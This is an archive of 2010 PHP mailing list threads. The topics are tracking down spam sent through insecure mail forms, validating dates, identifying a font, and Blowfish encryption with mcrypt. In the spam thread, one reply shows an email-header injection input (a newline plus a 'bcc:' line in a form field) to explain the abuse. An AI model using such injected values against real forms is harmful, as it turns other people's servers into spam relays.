On Mon, 2010-06-07 at 14:34 -0700, Brian Dunning wrote: I think I must have misstated the problem. Thanks to everyone for the replies, but the question is not how to fix it, it's how to find the script being attacked. Many different admins manage many different sites on this server, and I can't even begin to guess how many mail forms are on there from different programmers. I'm currently downloading the logs as Peter suggested, and will take a look. I'm not much of a sysad and I just thought maybe someone might know a way to sniff outgoing email or something, I really don't know how to attack this. Fixing the scripts is a long term solution, obviously, but I need a short term fix other than killing email on the apache account. Might be more of a Linux question than a PHP question. See if you can find all calls to a mail function in PHP. The easiest way to use a form to send spam is to enter your own headers, for example, in one of the fields. For instance, if a form has a to field, just enter a string like this: t...@test.com\nbcc:s...@spam.com which will then send email to the spam address as a bcc recipient. Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] Battle of Spam
Well you coud do just that but after you turn it back on. Set up a fresh error log based on the reset of the mail server. You then have some kind of script monitoring the in and out of your server. Disconnecting the mail server momentarily and maybe a pass reset for your users would stunt the hacker for a second, but would help you set up a line if defense before they found a way back in. I am not a sysad myself, but that seems like a logical way about it. If you let your users know ahead of time that this server and pass reset is to save their server from attack, most will ablige. Also let them know to not use the same password. There may be a better solution though that I don't know of. I'll let the gurus interject. :) Hth Karl Sent from losPhone On Jun 7, 2010, at 4:34 PM, Brian Dunning br...@briandunning.com wrote: I think I must have misstated the problem. Thanks to everyone for the replies, but the question is not how to fix it, it's how to find the script being attacked. Many different admins manage many different sites on this server, and I can't even begin to guess how many mail forms are on there from different programmers. I'm currently downloading the logs as Peter suggested, and will take a look. I'm not much of a sysad and I just thought maybe someone might know a way to sniff outgoing email or something, I really don't know how to attack this. Fixing the scripts is a long term solution, obviously, but I need a short term fix other than killing email on the apache account. Might be more of a Linux question than a PHP question. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
Brian Dunning wrote: I think I must have misstated the problem. Thanks to everyone for the replies, but the question is not how to fix it, it's how to find the script being attacked. Many different admins manage many different sites on this server, and I can't even begin to guess how many mail forms are on there from different programmers. I'm currently downloading the logs as Peter suggested, and will take a look. I'm not much of a sysad and I just thought maybe someone might know a way to sniff outgoing email or something, I really don't know how to attack this. Fixing the scripts is a long term solution, obviously, but I need a short term fix other than killing email on the apache account. Might be more of a Linux question than a PHP question. I think you miss understood Roberts suggestion. Please go back and re-read his message. Once you understand what information will be sent to you, you will realize by implementing this technique that you will be given all the information you need to identify the source of the problem. Then, hopefully you will also get the information you need to know how to resolve your issue. -- Jim Lucas A: Maybe because some people are too annoyed by top-posting. Q: Why do I not get an answer to my question(s)? A: Because it messes up the order in which people normally read text. Q: Why is top-posting such a bad thing? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
I'm currently geotargeting all the IPs in the log, and focusing on the hits from Russia (the majority of these apache@ spams seem to be Russian). I've got a much shorter list of scripts to look at now. Hopefully I'll find some that just use mail() with no scrubbing. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
On Mon, 2010-06-07 at 17:29 -0700, Brian Dunning wrote: I'm currently geotargeting all the IPs in the log, and focusing on the hits from Russia (the majority of these apache@ spams seem to be Russian). I've got a much shorter list of scripts to look at now. Hopefully I'll find some that just use mail() with no scrubbing. I wouldn't bother wasting your time on that to be honest, as spam could just as easily come from zombie machines, which could be scattered all over the globe. This sort of distributed attacking seems to be more and more commonplace these days. Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] complex if statement for field validation
David Mehler wrote:
Hello,
I've got a form with three fields that are not required for proper
completion of it, ending month, day, year fields. If a user enters
nothing no problem, but if those form fields are entered I need them
validated. They have to be in the correct format -MM-DD date
format and that value also has to be greater than the starting date
validated previously. I've got some not working code.
Thanks.
Dave.
// if an ending date field was entered validate that
// also must be greater than the starting date values
if(!empty($_POST['month1']) !empty($_POST['day1'])
!empty($_POST['year1']) {
$month1=$_POST['month1'];
$day1=$_POST['day1'];
$year1=$_POST['year1'];
$date_value1=$year1-$month1-$day1;
}
if(!checkdate($month1,$day1,$year1)) {
echo Invalid Date.\n;
} else {
echo Entered Date is correct.\n;
}
}
if(!checkdate($month1,$day1,$year1)) $date_value {
echo Invalid Date.\n;
} else {
echo Entered Date is correct.\n;
}
Well, I don't know if they are cut/paste errors, but you have a few syntax
errors in the above code...
# Initialize your date container variables
$date_value_ts = $date_value1_ts = null;
# Setup start date stuff
if ( !empty($_POST['month'])
!empty($_POST['day'])
!empty($_POST['year']) )
{
$month = (int)$_POST['month'];
$day= (int)$_POST['day'];
$year = (int)$_POST['year'];
$date_value = {$year}-{$month}-{$day};
#if ( !checkdate($month, $day, $year) )
if ( ($date_value_ts = strtotime($date_value) ) === FALSE )
{
echo Invalid Date.\n;
} else {
echo Entered Date is correct.\n;
}
}
Test for
if ( !empty($_POST['month1'])
!empty($_POST['day1'])
!empty($_POST['year1']) )
{
$month1 = (int)$_POST['month1'];
$day1 = (int)$_POST['day1'];
$year1 = (int)$_POST['year1'];
$date_value1= {$year1}-{$month1}-{$day1};
#if ( !checkdate($month1, $day1, $year1) )
if ( ($date_value1_ts = strtotime($date_value1) ) === FALSE )
{
echo Invalid Date.\n;
} else {
echo Entered Date is correct.\n;
}
}
# Compare the two dates. Make sure end date is after start date
if ( !is_null($date_value1_ts)
( (int)$date_value_ts (int)$date_value1_ts ) )
{
echo Invalid Date.\n;
} else {
echo Entered Date is correct.\n;
}
--
Jim Lucas
A: Maybe because some people are too annoyed by top-posting.
Q: Why do I not get an answer to my question(s)?
A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Finding a font.
Sorry everyone, I know this isn't PHP related and I hope I'm not out of line, If I am I sincerly appologize. I don't know who else I could ask. What I want to know if anyone can reconize this font. I have searched the web high and low and can't find any matching letter A's in the font examples. I could have found the correct font, but didn't have the A to compare it to. I've also checked Ooo.org's list of fonts and Gimp's list of fonts without any luck. Anyway I stuck the image of the letter on my website http://www.dmcentral.net/letterA.jpg -- Blessings, David M. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Finding a font.
Hi Dave, It is called Fine Hand I believe. Found a copy here. http://www.fonts.com/FindFonts/Detail.htm?pid=203813/cgi-bin/ MsmGo.exe?grab_id=0page_id=8346query=HANDWRITINGSCOPE=Fonts HTH, Karl On Jun 7, 2010, at 9:01 PM, David McGlone wrote: Sorry everyone, I know this isn't PHP related and I hope I'm not out of line, If I am I sincerly appologize. I don't know who else I could ask. What I want to know if anyone can reconize this font. I have searched the web high and low and can't find any matching letter A's in the font examples. I could have found the correct font, but didn't have the A to compare it to. I've also checked Ooo.org's list of fonts and Gimp's list of fonts without any luck. Anyway I stuck the image of the letter on my website http://www.dmcentral.net/letterA.jpg -- Blessings, David M. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php Karl DeSaulniers Design Drumm http://designdrumm.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
On Mon, Jun 07, 2010 at 02:34:23PM -0700, Brian Dunning wrote: I think I must have misstated the problem. Thanks to everyone for the replies, but the question is not how to fix it, it's how to find the script being attacked. Many different admins manage many different sites on this server, and I can't even begin to guess how many mail forms are on there from different programmers. I'm currently downloading the logs as Peter suggested, and will take a look. I'm not much of a sysad and I just thought maybe someone might know a way to sniff outgoing email or something, I really don't know how to attack this. Fixing the scripts is a long term solution, obviously, but I need a short term fix other than killing email on the apache account. Might be more of a Linux question than a PHP question. One other piece of information maybe you left out. You say there are many admins of many sites on this box. Do you *work* for the company that owns or rents the box or something? Otherwise, other admins' scripts aren't your problem, just your scripts. Paul -- Paul M. Foster -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Blowfish Encryption
I've got a file of passwords I'd like to encrypt/decrypt using blowfish. I'd
like to be able to do so with PHP and via the command line. I have a
Linux utility call bcrypt which encrypts/decrypts files using
blowfish. And I'm using the following code under PHP to do
encryption/decryption:
$raw_data = file('junk');
$input = implode('', $raw_data);
$td = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
$iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
mcrypt_generic_init($td, $key, $iv);
$encrypted_data = mcrypt_generic($td, $input);
file_put_contents('encjunk', $encrypted_data);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
Now, here's the problem. I'm using bcrypt to encrypt my junk file and
dump it out to an encrypted file. And I'm using the above PHP code to
encrypt the same file out to a different file. Using the same keys in
both cases, I get different encrypted files.
My logic: using the same encryption method and the same key, two
different implementations should produce equivalent files.
Yet they don't. I'm guessing that the initialization vector is
different between the two implementations, resulting in the difference
between the encrypted files.
For those who know more about encryption than I do, does that sound
right?
Paul
--
Paul M. Foster
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Finding a font.
On Mon, Jun 7, 2010 at 10:22 PM, Karl DeSaulniers k...@designdrumm.comwrote: Hi Dave, It is called Fine Hand I believe. Found a copy here. http://www.fonts.com/FindFonts/Detail.htm?pid=203813/cgi-bin/MsmGo.exe?grab_id=0page_id=8346query=HANDWRITINGSCOPE=Fonts HTH, Karl On Jun 7, 2010, at 9:01 PM, David McGlone wrote: Sorry everyone, I know this isn't PHP related and I hope I'm not out of line, If I am I sincerly appologize. I don't know who else I could ask. What I want to know if anyone can reconize this font. I have searched the web high and low and can't find any matching letter A's in the font examples. I could have found the correct font, but didn't have the A to compare it to. I've also checked Ooo.org's list of fonts and Gimp's list of fonts without any luck. Anyway I stuck the image of the letter on my website http://www.dmcentral.net/letterA.jpg -- Blessings, David M. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php Karl DeSaulniers Design Drumm http://designdrumm.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php I believe Karl nailed it. And, for future reference, WhatTheFont works quite well for this type of thing most of the time. I quick tested the image (after quick pulling out the background), and it was one of the top suggestions. Adam -- Nephtali: PHP web framework that functions beautifully http://nephtaliproject.com
Re: [PHP] Blowfish Encryption
On Mon, Jun 7, 2010 at 11:20 PM, Paul M Foster pa...@quillandmouse.comwrote:
I've got a file of passwords I'd like to encrypt/decrypt using blowfish.
I'd
like to be able to do so with PHP and via the command line. I have a
Linux utility call bcrypt which encrypts/decrypts files using
blowfish. And I'm using the following code under PHP to do
encryption/decryption:
$raw_data = file('junk');
$input = implode('', $raw_data);
$td = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
$iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
mcrypt_generic_init($td, $key, $iv);
$encrypted_data = mcrypt_generic($td, $input);
file_put_contents('encjunk', $encrypted_data);
mcrypt_generic_deinit($td);
mcrypt_module_close($td);
Now, here's the problem. I'm using bcrypt to encrypt my junk file and
dump it out to an encrypted file. And I'm using the above PHP code to
encrypt the same file out to a different file. Using the same keys in
both cases, I get different encrypted files.
My logic: using the same encryption method and the same key, two
different implementations should produce equivalent files.
Yet they don't. I'm guessing that the initialization vector is
different between the two implementations, resulting in the difference
between the encrypted files.
For those who know more about encryption than I do, does that sound
right?
Paul
--
Paul M. Foster
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
ECB (Electronic Code Book) mode works without an initialization vector.
Imagine having a big, thick code book, and every possible 8-letter
combination in the book. To encrypt the message, you thumb through the book
and find the plain text THE KIDS, and write down its cipher text
representation, JKWSCTFI. Easy to implement, and easy to maintain (you
don't have to make sure an IV is shared between the exchanging parties.)
If one has multiple samples of encrypted emails, it's likely that the
several of the samples will end using the same cipher text, as many people
end their emails with a consistent signature. This repeated cipher text
improves the ability of those trying to attack (decrypt the message.)
Hence, most professionals recommend avoiding ECB mode.
Now, looking at your PHP code, I see that it appears your mixing and
matching some of the families of calls in ways that might lead to unexpected
results. Try the below:
$ciphertext = mcrypt_encrypt(
$cipher = MCRYPT_BLOWFISH,
$key,
$plaintext,
$mode = 'cbc', // I just tossed this in as an example, but you should
match the mode bcrypt is using
$iv = 'use only once, sometimes a count, or a date' // needed for
decryption, too, although it doesn't have to remain a secret.
);
Hope this helps,
Adam
--
Nephtali: PHP web framework that functions beautifully
http://nephtaliproject.com
